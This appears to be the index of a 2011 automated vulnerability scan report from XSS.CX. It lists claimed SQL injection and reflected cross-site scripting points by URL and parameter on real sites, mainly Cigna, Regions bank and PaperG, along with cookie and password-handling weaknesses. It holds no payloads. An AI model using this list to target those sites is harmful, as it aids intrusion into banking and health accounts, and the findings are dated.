XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-05

Report generated byXSS.CX at Mon May 16 17:32:49 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77 cookie]

1.2. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [PageLoadMilliSecs XML attribute]

1.3. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp [Plugins XML attribute]

1.4. https://secureapps.regions.com/oao/app01.aspx [ctl00%24ContentPlaceHolder1%24txtPin parameter]

1.5. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [REST URL parameter 3]

1.6. http://www.paperg.com/flyerboard/app.com/1992/0.html [REST URL parameter 3]

1.7. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html [REST URL parameter 3]

1.8. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html [REST URL parameter 3]

1.9. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html [REST URL parameter 3]

1.10. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html [REST URL parameter 3]

1.11. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html [REST URL parameter 3]

1.12. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html [REST URL parameter 3]

1.13. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html [REST URL parameter 3]

1.14. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html [REST URL parameter 3]

1.15. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html [REST URL parameter 3]

1.16. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html [REST URL parameter 3]

1.17. http://www.paperg.com/flyerboard/nyprig/1552/45945.html [REST URL parameter 3]

1.18. http://www.paperg.com/flyerboard/nyprig/1753/45945.html [REST URL parameter 3]

1.19. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html [REST URL parameter 3]

1.20. http://www.paperg.com/flyerboard/olsens/1552/42482.html [REST URL parameter 3]

1.21. http://www.paperg.com/flyerboard/pathways/1552/43051.html [REST URL parameter 3]

1.22. http://www.paperg.com/flyerboard/pathways/1753/43051.html [REST URL parameter 3]

1.23. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html [REST URL parameter 3]

1.24. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html [REST URL parameter 3]

1.25. http://www.paperg.com/flyerboard/seton-health/1552/45970.html [REST URL parameter 3]

1.26. http://www.paperg.com/flyerboard/seton-health/1753/45970.html [REST URL parameter 3]

1.27. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html [REST URL parameter 3]

1.28. http://www.paperg.com/jsfb/embed.php [bid parameter]

1.29. http://www.regions.com/about_regions/company_info.rf [REST URL parameter 1]

1.30. http://www.regions.com/about_regions/email_fraud.rf [REST URL parameter 1]

1.31. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1]

1.32. http://www.regions.com/about_regions/protecting_self_online.rf [REST URL parameter 1]

1.33. http://www.regions.com/about_regions/report_fraud.rf [REST URL parameter 1]

1.34. http://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1]

1.35. http://www.regions.com/personal_banking/get_started_autoloan.rf [REST URL parameter 1]

1.36. http://www.regions.com/personal_banking/get_started_cds.rf [REST URL parameter 1]

1.37. http://www.regions.com/personal_banking/get_started_heloan.rf [REST URL parameter 1]

1.38. http://www.regions.com/personal_banking/get_started_heloc.rf [REST URL parameter 1]

1.39. http://www.regions.com/personal_banking/get_started_installmentloan.rf [REST URL parameter 1]

1.40. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf [REST URL parameter 1]

1.41. http://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1]

1.42. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1]

1.43. http://www.regions.com/personal_banking/online_security.rf [REST URL parameter 1]

1.44. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://cigna.com/favicon.ico [REST URL parameter 1]

2.2. http://cigna.com/login_registration/index.html [REST URL parameter 1]

2.3. http://cigna.com/login_registration/index.html [REST URL parameter 2]

2.4. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 1]

2.5. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 2]

2.6. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 3]

2.7. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 4]

2.8. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 1]

2.9. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 2]

2.10. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 3]

2.11. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 4]

2.12. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 5]

2.13. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 1]

2.14. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 2]

2.15. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 3]

2.16. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 4]

2.17. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 5]

2.18. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 6]

2.19. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 1]

2.20. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 2]

2.21. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 3]

2.22. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 4]

2.23. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

2.24. https://secureapps.regions.com/OAO/DESGetFiles.aspx [files parameter]

2.25. https://sso.corp.cigna.com/corp/sso/professional/controller [DESTINATION parameter]

2.26. https://sso.corp.cigna.com/corp/sso/professional/controller [fname parameter]

2.27. https://sso.corp.cigna.com/corp/sso/professional/controller [lname parameter]

2.28. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [boards%5B%5D parameter]

2.29. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.30. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.31. http://www.paperg.com/jsfb/embed.php [bid parameter]

2.32. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

2.33. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

3. Flash cross-domain policy

3.1. http://ajax.googleapis.com/crossdomain.xml

3.2. http://statse.webtrendslive.com/crossdomain.xml

3.3. https://www.paperg.com/crossdomain.xml

3.4. http://www.placelocal.com/crossdomain.xml

3.5. http://ads.bridgetrack.com/crossdomain.xml

3.6. http://feeds.bbci.co.uk/crossdomain.xml

3.7. http://newsrss.bbc.co.uk/crossdomain.xml

3.8. http://www.paperg.com/crossdomain.xml

3.9. http://www.regions.com/crossdomain.xml

3.10. https://www.regions.com/crossdomain.xml

3.11. http://xsinternational.app6.hubspot.com/crossdomain.xml

4. Cleartext submission of password

4.1. http://cigna.com/

4.2. http://www.paperg.com/

4.3. http://www.paperg.com/company.php

4.4. http://www.paperg.com/contact.php

4.5. http://www.paperg.com/join.php

4.6. http://www.paperg.com/press.php

4.7. http://www.paperg.com/publishers/flyerboard.php

4.8. http://www.paperg.com/publishers/placelocal.php

4.9. http://www.paperg.com/support.php

5. SSL cookie without secure flag set

5.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do

5.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do

5.3. https://cignaforhcp.cigna.com/wps/portal

5.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

5.5. https://my.cigna.com/web/public/forgotid

5.6. https://my.cigna.com/web/public/forgotpassword

5.7. https://securebank.regions.com/ForgottenPassword.aspx

5.8. https://securebank.regions.com/login.aspx

5.9. https://sso.corp.cigna.com/corp/sso/professional/controller

5.10. https://www.paperg.com/forgot.php

5.11. https://www.planservices.com/regions/

5.12. https://www.regions.com/

5.13. https://www.regions.com/personal_banking.rf

5.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

5.15. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

5.16. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif

5.17. https://my.cigna.com/mycignatheme/js/min/jsTop.js

5.18. https://my.cigna.com/mycignatheme/js/min/jsTop.js

5.19. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

5.20. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

5.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

5.22. https://my.cigna.com/web/public/guest

5.23. https://my.cigna.com/web/public/guest

5.24. https://secure.regionsmortgage.com/favicon.ico

5.25. https://secureapps.regions.com/

5.26. https://secureapps.regions.com/OAO/DESGetFiles.aspx

5.27. https://secureapps.regions.com/favicon.ico

5.28. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css

5.29. https://secureapps.regions.com/oao/ErrorPage.aspx

5.30. https://secureapps.regions.com/oao/FormHandler.js

5.31. https://secureapps.regions.com/oao/Images/confirmation.gif

5.32. https://secureapps.regions.com/oao/Images/funding.gif

5.33. https://secureapps.regions.com/oao/Images/gettingstarted.gif

5.34. https://secureapps.regions.com/oao/Images/helpIcon.gif

5.35. https://secureapps.regions.com/oao/Images/loading7.gif

5.36. https://secureapps.regions.com/oao/Images/yourinformation.gif

5.37. https://secureapps.regions.com/oao/Scripts/jquery.js

5.38. https://secureapps.regions.com/oao/Scripts/thickbox.js

5.39. https://secureapps.regions.com/oao/app01.aspx

5.40. https://secureapps.regions.com/oao/app02.aspx

5.41. https://secureapps.regions.com/oao/images/arrowOrange.gif

5.42. https://secureapps.regions.com/oao/images/bgDot.gif

5.43. https://secureapps.regions.com/oao/images/continue.gif

5.44. https://secureapps.regions.com/oao/images/ehl_logo.gif

5.45. https://secureapps.regions.com/oao/images/error.gif

5.46. https://secureapps.regions.com/oao/images/homepage.gif

5.47. https://secureapps.regions.com/oao/images/icon_secure.gif

5.48. https://secureapps.regions.com/oao/images/loadingAnimation.gif

5.49. https://secureapps.regions.com/oao/scripts/wtbase.js

5.50. https://secureapps.regions.com/oao/styles/main.css

5.51. https://secureapps.regions.com/oao/styles/thickbox.css

5.52. https://securebank.regions.com/SystemUnavailable.aspx

5.53. https://securebank.regions.com/VAM/2_0_2/VAM.js

5.54. https://securebank.regions.com/VAM/2_0_2/VAML2.js

5.55. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js

5.56. https://securebank.regions.com/favicon.ico

5.57. https://securebank.regions.com/images/btnContinue.gif

5.58. https://securebank.regions.com/images/equalhousing.gif

5.59. https://securebank.regions.com/images/green/rf_logo.gif

5.60. https://securebank.regions.com/images/red_arrow.gif

5.61. https://securebank.regions.com/images/spacer.gif

5.62. https://securebank.regions.com/script/regions.js

5.63. https://securebank.regions.com/styles/styles.AmSouth.css

5.64. https://securebank.regions.com/styles/stylesprint.css

5.65. https://sso.corp.cigna.com/

5.66. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif

5.67. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif

5.68. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg

5.69. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif

5.70. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif

5.71. https://sso.corp.cigna.com/corp/sso/images/pshim.gif

5.72. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif

5.73. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif

5.74. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

5.75. https://sso.corp.cigna.com/favicon.ico

5.76. https://www.regions.com/App_Themes/2010/Ems.css

5.77. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif

5.78. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png

5.79. https://www.regions.com/App_Themes/2010/img/staticImages.gif

5.80. https://www.regions.com/Img/sm_558800_oo.gif

5.81. https://www.regions.com/JS/cmbd-jquery.min.js

5.82. https://www.regions.com/JS/loadMedia.min.js

5.83. https://www.regions.com/favicon.ico

5.84. https://www.regions.com/js/_bt.js

5.85. https://www.regions.com/js/wtbase.js

5.86. https://www.regions.com/virtualMedia/img2612.jpg

5.87. https://www.regions.com/virtualMedia/img3090.jpg

5.88. https://www.regions.com/virtualMedia/img3094.jpg

5.89. https://www.regions.com/virtualMedia/img3107.jpg

5.90. https://www.regions.com/virtualMedia/img3108.jpg

5.91. https://www.regions.com/virtualMedia/img3132.jpg

5.92. https://www.regions.com/virtualMedia/img506.gif

6. Session token in URL

6.1. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

6.2. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

6.3. http://mt1.googleapis.com/mapslt/ft

7. Cookie scoped to parent domain

7.1. http://www.placelocal.com/forgot_password.php

7.2. http://cf.addthis.com/red/p.json

7.3. http://id.google.com/verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif

7.4. http://id.google.com/verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif

7.5. https://my.cigna.com/web/public/forgotid

7.6. https://my.cigna.com/web/public/forgotpassword

7.7. https://my.cigna.com/web/public/guest

7.8. https://secure.regionsmortgage.com/favicon.ico

7.9. https://sso.corp.cigna.com/

7.10. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif

7.11. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif

7.12. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg

7.13. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif

7.14. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif

7.15. https://sso.corp.cigna.com/corp/sso/images/pshim.gif

7.16. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif

7.17. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif

7.18. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

7.19. https://sso.corp.cigna.com/corp/sso/professional/controller

7.20. https://sso.corp.cigna.com/favicon.ico

7.21. http://va.px.invitemedia.com/pixel

8. Cookie without HttpOnly flag set

8.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do

8.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do

8.3. https://cignaforhcp.cigna.com/wps/portal

8.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

8.5. https://my.cigna.com/web/public/forgotid

8.6. https://my.cigna.com/web/public/forgotpassword

8.7. https://securebank.regions.com/ForgottenPassword.aspx

8.8. https://securebank.regions.com/login.aspx

8.9. https://sso.corp.cigna.com/corp/sso/professional/controller

8.10. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html

8.11. https://www.paperg.com/forgot.php

8.12. http://www.placelocal.com/forgot_password.php

8.13. https://www.planservices.com/regions/

8.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

8.15. http://ads.bridgetrack.com/site/rtgt.asp

8.16. http://cf.addthis.com/red/p.json

8.17. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

8.18. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif

8.19. https://my.cigna.com/mycignatheme/js/min/jsTop.js

8.20. https://my.cigna.com/mycignatheme/js/min/jsTop.js

8.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

8.22. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

8.23. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

8.24. https://my.cigna.com/web/public/guest

8.25. https://my.cigna.com/web/public/guest

8.26. http://regions.com/

8.27. https://secure.regionsmortgage.com/favicon.ico

8.28. https://secureapps.regions.com/

8.29. https://secureapps.regions.com/OAO/DESGetFiles.aspx

8.30. https://secureapps.regions.com/favicon.ico

8.31. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css

8.32. https://secureapps.regions.com/oao/ErrorPage.aspx

8.33. https://secureapps.regions.com/oao/FormHandler.js

8.34. https://secureapps.regions.com/oao/Images/confirmation.gif

8.35. https://secureapps.regions.com/oao/Images/funding.gif

8.36. https://secureapps.regions.com/oao/Images/gettingstarted.gif

8.37. https://secureapps.regions.com/oao/Images/helpIcon.gif

8.38. https://secureapps.regions.com/oao/Images/loading7.gif

8.39. https://secureapps.regions.com/oao/Images/yourinformation.gif

8.40. https://secureapps.regions.com/oao/Scripts/jquery.js

8.41. https://secureapps.regions.com/oao/Scripts/thickbox.js

8.42. https://secureapps.regions.com/oao/app01.aspx

8.43. https://secureapps.regions.com/oao/app02.aspx

8.44. https://secureapps.regions.com/oao/images/arrowOrange.gif

8.45. https://secureapps.regions.com/oao/images/bgDot.gif

8.46. https://secureapps.regions.com/oao/images/continue.gif

8.47. https://secureapps.regions.com/oao/images/ehl_logo.gif

8.48. https://secureapps.regions.com/oao/images/error.gif

8.49. https://secureapps.regions.com/oao/images/homepage.gif

8.50. https://secureapps.regions.com/oao/images/icon_secure.gif

8.51. https://secureapps.regions.com/oao/images/loadingAnimation.gif

8.52. https://secureapps.regions.com/oao/scripts/wtbase.js

8.53. https://secureapps.regions.com/oao/styles/main.css

8.54. https://secureapps.regions.com/oao/styles/thickbox.css

8.55. https://securebank.regions.com/SystemUnavailable.aspx

8.56. https://securebank.regions.com/VAM/2_0_2/VAM.js

8.57. https://securebank.regions.com/VAM/2_0_2/VAML2.js

8.58. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js

8.59. https://securebank.regions.com/favicon.ico

8.60. https://securebank.regions.com/images/btnContinue.gif

8.61. https://securebank.regions.com/images/equalhousing.gif

8.62. https://securebank.regions.com/images/green/rf_logo.gif

8.63. https://securebank.regions.com/images/red_arrow.gif

8.64. https://securebank.regions.com/images/spacer.gif

8.65. https://securebank.regions.com/script/regions.js

8.66. https://securebank.regions.com/styles/styles.AmSouth.css

8.67. https://securebank.regions.com/styles/stylesprint.css

8.68. https://sso.corp.cigna.com/

8.69. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif

8.70. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif

8.71. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg

8.72. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif

8.73. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif

8.74. https://sso.corp.cigna.com/corp/sso/images/pshim.gif

8.75. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif

8.76. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif

8.77. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css

8.78. https://sso.corp.cigna.com/favicon.ico

8.79. http://statse.webtrendslive.com/dcs4b71fc10000gs8u88h5t1k_6n2i/dcs.gif

8.80. http://statse.webtrendslive.com/dcspiqc94wz5bdfiwi4batkw3_5h6k/dcs.gif

8.81. http://va.px.invitemedia.com/pixel

8.82. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css

8.83. http://www.mycigna.com/rte/public/gatekeeper

8.84. http://www.placelocal.com/

8.85. http://www.regions.com/

8.86. http://www.regions.com/App_Themes/2010/Ems.css

8.87. http://www.regions.com/App_Themes/2010/img/arrowGray_Small.gif

8.88. http://www.regions.com/App_Themes/2010/img/hdrItemSep.gif

8.89. http://www.regions.com/App_Themes/2010/img/headerfullBG.gif

8.90. http://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif

8.91. http://www.regions.com/App_Themes/2010/img/staticFlyouts.png

8.92. http://www.regions.com/App_Themes/2010/img/staticImages.gif

8.93. http://www.regions.com/App_Themes/IE6/Ems.css

8.94. http://www.regions.com/App_Themes/IE6/img/hdrItemSep.gif

8.95. http://www.regions.com/App_Themes/IE6/img/staticBackgrounds.gif

8.96. http://www.regions.com/App_Themes/IE6/img/staticFlyouts.png

8.97. http://www.regions.com/App_Themes/IE6/img/staticImages.gif

8.98. http://www.regions.com/App_Themes/Promotion/Ems.css

8.99. http://www.regions.com/App_Themes/Promotion/img/arrowGray_Small.gif

8.100. http://www.regions.com/App_Themes/Promotion/img/staticBackgrounds.gif

8.101. http://www.regions.com/App_Themes/Promotion/img/staticImages.gif

8.102. http://www.regions.com/Img/sm_558800_oo.gif

8.103. http://www.regions.com/JS/cmbd-jquery.min.js

8.104. http://www.regions.com/JS/loadMedia.js

8.105. http://www.regions.com/JS/loadMedia.min.js

8.106. http://www.regions.com/about_regions/IR_investorrelations.html

8.107. http://www.regions.com/about_regions/company_info.rf

8.108. http://www.regions.com/about_regions/email_fraud.rf

8.109. http://www.regions.com/about_regions/privacy_security.rf

8.110. http://www.regions.com/about_regions/protecting_self_online.rf

8.111. http://www.regions.com/about_regions/report_fraud.rf

8.112. http://www.regions.com/favicon.ico

8.113. http://www.regions.com/img/arrowGray_Small.gif

8.114. http://www.regions.com/js/_bt.js

8.115. http://www.regions.com/js/wtbase.js

8.116. http://www.regions.com/personal_banking/email_starting_net.rf

8.117. http://www.regions.com/personal_banking/get_started_autoloan.rf

8.118. http://www.regions.com/personal_banking/get_started_cds.rf

8.119. http://www.regions.com/personal_banking/get_started_heloan.rf

8.120. http://www.regions.com/personal_banking/get_started_heloc.rf

8.121. http://www.regions.com/personal_banking/get_started_installmentloan.rf

8.122. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf

8.123. http://www.regions.com/personal_banking/loans_credit.rf

8.124. http://www.regions.com/personal_banking/online_banking_help.rf

8.125. http://www.regions.com/personal_banking/online_security.rf

8.126. http://www.regions.com/personal_banking/open_account.rf

8.127. http://www.regions.com/virtualMedia/img1213.gif

8.128. http://www.regions.com/virtualMedia/img2020.gif

8.129. http://www.regions.com/virtualMedia/img2027.gif

8.130. http://www.regions.com/virtualMedia/img2028.gif

8.131. http://www.regions.com/virtualMedia/img243.gif

8.132. http://www.regions.com/virtualMedia/img422.gif

8.133. http://www.regions.com/virtualMedia/img506.gif

8.134. http://www.regions.com/virtualMedia/img537.gif

8.135. http://www.regions.com/virtualMedia/img563.gif

8.136. http://www.regions.com/virtualMedia/img588.gif

8.137. http://www.regions.com/virtualMedia/img828.gif

8.138. http://www.regions.com/virtualmedia/img240.gif

8.139. http://www.regions.com/virtualmedia/img265.gif

8.140. http://www.regions.com/virtualmedia/img286.jpg

8.141. http://www.regions.com/wrapperHeader.aspx

8.142. https://www.regions.com/

8.143. https://www.regions.com/App_Themes/2010/Ems.css

8.144. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif

8.145. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png

8.146. https://www.regions.com/App_Themes/2010/img/staticImages.gif

8.147. https://www.regions.com/Img/sm_558800_oo.gif

8.148. https://www.regions.com/JS/cmbd-jquery.min.js

8.149. https://www.regions.com/JS/loadMedia.min.js

8.150. https://www.regions.com/favicon.ico

8.151. https://www.regions.com/js/_bt.js

8.152. https://www.regions.com/js/wtbase.js

8.153. https://www.regions.com/personal_banking.rf

8.154. https://www.regions.com/virtualMedia/img2612.jpg

8.155. https://www.regions.com/virtualMedia/img3090.jpg

8.156. https://www.regions.com/virtualMedia/img3094.jpg

8.157. https://www.regions.com/virtualMedia/img3107.jpg

8.158. https://www.regions.com/virtualMedia/img3108.jpg

8.159. https://www.regions.com/virtualMedia/img3132.jpg

8.160. https://www.regions.com/virtualMedia/img506.gif

8.161. http://www.regionsmortgage.com/BeforeYouBegin/ApplyNow

8.162. http://www.xsnet.com/

8.163. http://xsinternational.app6.hubspot.com/salog.js.aspx

9. Password field with autocomplete enabled

9.1. http://cigna.com/

9.2. https://cignaforhcp.cigna.com/wps/portal

9.3. https://www.frontrowusa.com/Cart/Address

9.4. https://www.frontrowusa.com/members/login

9.5. http://www.paperg.com/

9.6. http://www.paperg.com/company.php

9.7. http://www.paperg.com/contact.php

9.8. http://www.paperg.com/join.php

9.9. http://www.paperg.com/press.php

9.10. http://www.paperg.com/publishers/flyerboard.php

9.11. http://www.paperg.com/publishers/placelocal.php

9.12. http://www.paperg.com/support.php

9.13. https://www.paperg.com/

9.14. https://www.paperg.com/post.php

9.15. https://www.paperg.com/post.php

9.16. http://www.placelocal.com/

9.17. http://www.placelocal.com/forgot_password.php

9.18. https://www.planservices.com/regions/

10. Referer-dependent response

11. Cross-domain POST

11.1. http://cigna.com/

11.2. http://www.frontrowusa.com/

11.3. http://www.frontrowusa.com/Concerts/U2_Tickets.htm

11.4. http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm

11.5. http://www.frontrowusa.com/Sell-Tickets

11.6. http://www.frontrowusa.com/Sports_Tickets

11.7. https://www.frontrowusa.com/Cart

11.8. https://www.frontrowusa.com/Cart/Address

11.9. https://www.frontrowusa.com/members/login

11.10. http://www.mycigna.com/

12. Cross-domain Referer leakage

12.1. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

12.2. http://phx.corporate-ir.net/phoenix.zhtml

12.3. https://securebank.regions.com/SystemUnavailable.aspx

12.4. http://www.google.com/search

12.5. http://www.google.com/search

12.6. http://www.mycigna.com/sslreq.html

12.7. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html

12.8. http://www.regions.com/wrapperHeader.aspx

12.9. http://www.regionsmortgage.com/Error/Error

12.10. http://www.xsnet.com/Portals/64787/footerStuff.html

13. Cross-domain script include

13.1. https://secureapps.regions.com/oao/ErrorPage.aspx

13.2. https://secureapps.regions.com/oao/app01.aspx

13.3. https://secureapps.regions.com/oao/app02.aspx

13.4. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html

13.5. http://www.frontrowusa.com/

13.6. http://www.frontrowusa.com/Concerts/U2_Tickets.htm

13.7. http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm

13.8. http://www.frontrowusa.com/Sell-Tickets

13.9. http://www.frontrowusa.com/Sports_Tickets

13.10. https://www.frontrowusa.com/Cart

13.11. https://www.frontrowusa.com/Cart/Address

13.12. https://www.frontrowusa.com/members/login

13.13. http://www.paperg.com/

13.14. http://www.paperg.com/company.php

13.15. http://www.paperg.com/contact.php

13.16. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html

13.17. http://www.paperg.com/flyerboard/app.com/1992/0.html

13.18. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html

13.19. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html

13.20. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html

13.21. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html

13.22. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html

13.23. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html

13.24. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html

13.25. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html

13.26. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html

13.27. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html

13.28. http://www.paperg.com/flyerboard/nyprig/1552/45945.html

13.29. http://www.paperg.com/flyerboard/nyprig/1753/45945.html

13.30. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html

13.31. http://www.paperg.com/flyerboard/olsens/1552/42482.html

13.32. http://www.paperg.com/flyerboard/pathways/1552/43051.html

13.33. http://www.paperg.com/flyerboard/pathways/1753/43051.html

13.34. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html

13.35. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html

13.36. http://www.paperg.com/flyerboard/seton-health/1552/45970.html

13.37. http://www.paperg.com/flyerboard/seton-health/1753/45970.html

13.38. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html

13.39. http://www.paperg.com/join.php

13.40. http://www.paperg.com/press.php

13.41. http://www.paperg.com/publishers/flyerboard.php

13.42. http://www.paperg.com/publishers/placelocal.php

13.43. http://www.paperg.com/support.php

13.44. https://www.paperg.com/

13.45. https://www.paperg.com/forgot.php

13.46. https://www.paperg.com/post.php

13.47. http://www.placelocal.com/

13.48. http://www.xsnet.com/

13.49. http://www.xsnet.com/datacenter-relocation-services/

13.50. http://www.xsnet.com/it-asset-disposition-services/

14. Email addresses disclosed

14.1. https://my.cigna.com/mycignatheme/js/min/js.js

14.2. https://my.cigna.com/mycignatheme/js/min/jsTop.js

14.3. https://securebank.regions.com/ForgottenPassword.aspx

14.4. https://securebank.regions.com/SystemUnavailable.aspx

14.5. https://securebank.regions.com/VAM/2_0_2/VAM.js

14.6. https://securebank.regions.com/VAM/2_0_2/VAML2.js

